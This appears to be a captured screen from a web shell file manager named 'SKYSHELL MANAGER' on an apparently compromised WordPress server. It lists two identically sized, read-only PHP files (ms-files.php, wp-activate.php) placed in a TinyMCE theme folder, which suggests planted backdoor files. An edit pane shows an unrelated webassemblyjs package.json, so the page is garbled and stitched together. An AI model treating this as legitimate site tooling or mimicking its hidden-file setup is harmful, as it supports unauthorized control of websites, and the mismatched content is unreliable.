📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@webassemblyjs/wasm-text-gen", "version": "1.11.3", "description": "Emit documentation/code for your WASM binary Edit", "keywords": [ "webassembly", "javascript", "wasm", "binary", "markdown" ], "main": "lib/index.js", "module": "esm/index.js", "scripts": { "test": "mocha" }, "repository": { "type": "git", "url": "https://github.com/xtuc/webassemblyjs.git" }, "publishConfig": { "access": "public" }, "author": "Sven Sauleau", "license": "MIT", "bin": { "wasmgen": "lib/cli.js" }, "dependencies": { "@babel/generator": "^7.0.0-beta.40", "@babel/template": "^7.0.0-beta.40", "@babel/types": "^7.0.0-beta.40", "@webassemblyjs/ast": "1.11.3", "@webassemblyjs/wasm-parser": "1.11.3", "commander": "^2.14.1" } }
Save